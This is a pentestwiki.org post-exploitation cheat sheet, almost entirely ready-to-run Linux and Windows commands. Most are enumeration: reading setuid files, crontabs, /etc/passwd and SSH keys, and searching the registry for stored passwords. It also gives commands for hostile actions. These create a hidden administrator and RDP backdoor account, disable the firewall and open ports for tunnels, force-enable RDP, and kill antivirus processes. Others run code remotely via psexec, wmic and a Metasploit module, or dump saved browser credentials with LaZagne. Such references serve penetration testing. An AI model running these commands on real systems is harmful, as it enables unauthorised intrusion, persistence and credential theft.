Post exploitation

From pentestwiki.org

Linux

  • Check wrong permissions:

Find setuid binaries:

$find / -perm -4000 -ls 2> /dev/null


Find files world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null


Find directories world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null


  • Look for interesting files:
$find / -name "*.txt" -ls 2> /dev/null
$find / -name "*.log" -ls 2> /dev/null


  • Check sudo:
$sudo su
$sudo -l


  • Decrypt PKCS#12 objects:
$openssl pkcs12 -info -in $FILE


  • Show certs in PKCS#7 file:
$openssl pkcs7 -print_certs -inform DER -in $FILE
$openssl smime -verify -in signed.p7 -inform [pem|der]


Show keystore content:

$keytool -list -v -keystore keystore.jks


  • Commands for information gathering:
$ps -ef


$mount


$/sbin/ifconfig -a


$route -n


$cat /etc/crontab
$ls -la /var/spool/cron*/
$ls -la /etc/cron.d


$cat /etc/exports


$cat /etc/redhat* /etc/debian* /etc/*release


$netstat -tanu


Find users with shell access:

$cat /etc/passwd | egrep -e '/bin/(ba)?sh'


Check bootup services:

$ls /etc/rc*


SSH relationships and logins:

$cat ~/.ssh/*


References:

Tools:

Windows

Check filesystem:

Like "ls -la" in Linux:

C:>dir /A:H


C:>dir /s /b C:\ | findstr /E ".txt" > txt.txt
C:>dir /s /b C:\ | findstr /E ".log" > log.txt
C:>dir /s /b C:\ | findstr /E ".doc" > txt
C:>dir /s /b C:\ | findstr /E ".xls" > xls.txt
C:>dir /s /b C:\ | findstr /E ".xml" > xml.txt


Check registry:

C:>reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
C:>reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
C:>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
C:>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt


Check scheduler:

C:>schtasks /query /fo LIST /v > schtasks.txt
C:>tasklist /SVC > tasklist.txt


Other checks:

C:>DRIVERQUERY
C:>wmic os where Primary='TRUE' reboot


List hotfixes:

C:>wmic qfe


C:>notepad myfile.txt:lion.txt
C:>eventvwr.exe
C:>quser > rdp.txt
C:>netstat -an > netstat.txt
C:>netsh firewall show config > firewall.txt
C:>icacls service.exe
C:>type C:\Windows\System32\drivers\etc\hosts


Wmic commands:

C:>wmic service get name,displayname,pathname,startmode > wmic_service.txt
C:>wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
C:>wmic /node:"" product get name,version,vendor
C:>wmic process get Caption,CommandLine
C:>wmic printer list status
C:>wmic cpu get

List SIDs of the system (as admin):

C:>wmic useraccount get name,sid,fullname


Net commands:

C:>net view
C:>net view \\host
C:>net share
C:>net use z: \\host\dir
C:>net users
C:>net user %username%
C:>net config rdr


Backdoor account:

C:>net user hax0r hax0r /add
C:>net localgroup administrators hax0r /add
C:>net localgroup "Remote Desktop users" hax0r /add


Check routing/network information:

C:>route print
C:>arp -A
C:>ipconfig /all
C:>getmac


Show files attributes / permissions

C:>cacls cmd.exe
C:>attrib cmd.exe


List services:

C:>sc queryex type= service state= all


List services

C:>net start
C:>systeminfo
C:>whoami


Idem for Win XP:

C:>echo %USERNAME%


  • Firewall
C:>netsh firewall show state
C:>netsh firewall show config
C:>netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:>netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:>netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:>netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079


Disable firewall:

C:>netsh advfirewall set currentprofile state off


C:>netsh advfirewall set allprofiles state off


  • RDP

Show RDP sessions:

C:>quser


C:>qwinsta
C:>reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
msf>reg queryval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled
msf>reg setval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled -d 1
C:>netsh firewall set service type = remotedesktop mode = enable
C:>net start termservice
C:>net start "Terminal Services"
C:>svchost.exe -k termsvcs
C:>tasklist /svc /S servername/U username /P password


Change RDP port:

\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389 


Remote Execution

C:>wmis -U DOMAIN\<USER>%<PASS> //<DC> cmd.exe /c <COMMAND>
C:>wmic /node:$IP /user:administrator /password:mypassword bios get serialnumber
C:>tasklist.exe /S $IP /U domain\username
C:>tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
C:>taskkill.exe /S $IP /U domain\username /F /FI "norton"
C:>quser /SERVER:$IP


From sysinternals psexec:

C:>psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
C:>psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
C:>psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

C:>psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp



Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(windows/local/ps_wmi_exec) >


  • In the same host but with other role:
C:>runas /user:administrator cmd
C:>runas /noprofile /user:DOMAIN\administrator cmd
C:>runas /profile /env /user:DOMAIN\<USER> "%windir%\system32\script.bat"




  • Windows exploit suggester / Windows-Exploit-Suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)

$python windows-exploit-suggester.py --update
$python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt


Tools for information gathering

  • Manual method
C:>dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
C:>dir %USERPROFILE%\Favorites
C:>type C:\Windows\System32\drivers\etc\hosts



C:>laZagne.exe all


C:>laZagne.exe browsers


C:>laZagne.exe browsers -firefox